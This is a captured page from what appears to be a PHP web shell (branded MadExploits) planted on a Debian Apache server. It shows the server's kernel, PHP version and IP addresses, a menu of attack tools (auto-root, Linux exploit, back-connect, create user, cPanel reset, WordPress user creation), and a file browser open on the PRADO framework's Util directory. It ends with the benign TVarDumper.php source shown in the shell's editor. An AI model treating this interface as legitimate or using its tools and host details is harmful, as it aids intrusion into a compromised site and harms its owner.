Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.139.86.58
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Util /
[ HOME SHELL ]
Name
Size
Permission
Action
Behaviors
[ DIR ]
drwxr-xr-x
Cron
[ DIR ]
drwxr-xr-x
IBaseBehavior.php
957
B
-rw-r--r--
IBehavior.php
957
B
-rw-r--r--
IClassBehavior.php
1.43
KB
-rw-r--r--
IDbModule.php
959
B
-rw-r--r--
IDynamicMethods.php
618
B
-rw-r--r--
IInstanceCheck.php
1.35
KB
-rw-r--r--
IPluginModule.php
531
B
-rw-r--r--
TBehavior.php
2.41
KB
-rw-r--r--
TBehaviorsModule.php
7.83
KB
-rw-r--r--
TBrowserLogRoute.php
4.75
KB
-rw-r--r--
TCallChain.php
6.08
KB
-rw-r--r--
TClassBehavior.php
852
B
-rw-r--r--
TClassBehaviorEventParameter.p...
1.81
KB
-rw-r--r--
TDataFieldAccessor.php
3.38
KB
-rw-r--r--
TDbLogRoute.php
6.08
KB
-rw-r--r--
TDbParameterModule.php
22.81
KB
-rw-r--r--
TDbPluginModule.php
2.88
KB
-rw-r--r--
TEmailLogRoute.php
3.66
KB
-rw-r--r--
TFileLogRoute.php
4.09
KB
-rw-r--r--
TFirePhpLogRoute.php
2.96
KB
-rw-r--r--
TFirebugLogRoute.php
3.81
KB
-rw-r--r--
TJsonRpcClient.php
2.47
KB
-rw-r--r--
TLogRoute.php
4.82
KB
-rw-r--r--
TLogRouter.php
5.18
KB
-rw-r--r--
TLogger.php
8.32
KB
-rw-r--r--
TParameterModule.php
5.45
KB
-rw-r--r--
TPluginModule.php
4.84
KB
-rw-r--r--
TRpcClient.php
3.91
KB
-rw-r--r--
TRpcClientRequestException.php
590
B
-rw-r--r--
TRpcClientResponseException.ph...
725
B
-rw-r--r--
TRpcClientTypesEnumerable.php
458
B
-rw-r--r--
TSimpleDateFormatter.php
8.86
KB
-rw-r--r--
TUtf8Converter.php
1.34
KB
-rw-r--r--
TVarDumper.php
3.43
KB
-rw-r--r--
TXmlRpcClient.php
2.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TVarDumper.php
<?php /** * TVarDumper class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Util; /** * TVarDumper class. * * TVarDumper is intended to replace the buggy PHP function var_dump and print_r. * It can correctly identify the recursively referenced objects in a complex * object structure. It also has a recursive depth control to avoid indefinite * recursive display of some peculiar variables. * * TVarDumper can be used as follows, * <code> * echo TVarDumper::dump($var); * </code> * * @author Qiang Xue <qiang.xue@gmail.com> * @since 3.0 */ class TVarDumper { private static $_objects; private static $_output; private static $_depth; /** * Converts a variable into a string representation. * This method achieves the similar functionality as var_dump and print_r * but is more robust when handling complex objects such as PRADO controls. * @param mixed $var variable to be dumped * @param int $depth maximum depth that the dumper should go into the variable. Defaults to 10. * @param bool $highlight wether to highlight th resulting string * @return string the string representation of the variable */ public static function dump($var, $depth = 10, $highlight = false) { self::$_output = ''; self::$_objects = []; self::$_depth = $depth; self::dumpInternal($var, 0); if ($highlight) { $result = highlight_string("<?php\n" . self::$_output, true); return preg_replace('/<\\?php<br \\/>/', '', $result, 1); } else { return self::$_output; } } private static function dumpInternal($var, $level) { switch (gettype($var)) { case 'boolean': self::$_output .= $var ? 'true' : 'false'; break; case 'integer': self::$_output .= "$var"; break; case 'double': self::$_output .= "$var"; break; case 'string': self::$_output .= "'$var'"; break; case 'resource': self::$_output .= '{resource}'; break; case 'NULL': self::$_output .= "null"; break; case 'unknown type': self::$_output .= '{unknown}'; break; case 'array': if (self::$_depth <= $level) { self::$_output .= 'array(...)'; } elseif (empty($var)) { self::$_output .= 'array()'; } else { $keys = array_keys($var); $spaces = str_repeat(' ', $level * 4); self::$_output .= "array\n" . $spaces . '('; foreach ($keys as $key) { self::$_output .= "\n" . $spaces . " [$key] => "; self::$_output .= self::dumpInternal($var[$key], $level + 1); } self::$_output .= "\n" . $spaces . ')'; } break; case 'object': if (($id = array_search($var, self::$_objects, true)) !== false) { self::$_output .= get_class($var) . '#' . ($id + 1) . '(...)'; } elseif (self::$_depth <= $level) { self::$_output .= get_class($var) . '(...)'; } else { $id = array_push(self::$_objects, $var); $className = get_class($var); $members = (array) $var; $keys = array_keys($members); $spaces = str_repeat(' ', $level * 4); self::$_output .= "$className#$id\n" . $spaces . '('; foreach ($keys as $key) { $keyDisplay = strtr(trim($key), ["\0" => ':']); self::$_output .= "\n" . $spaces . " [$keyDisplay] => "; self::$_output .= self::dumpInternal($members[$key], $level + 1); } self::$_output .= "\n" . $spaces . ')'; } break; } } }
Close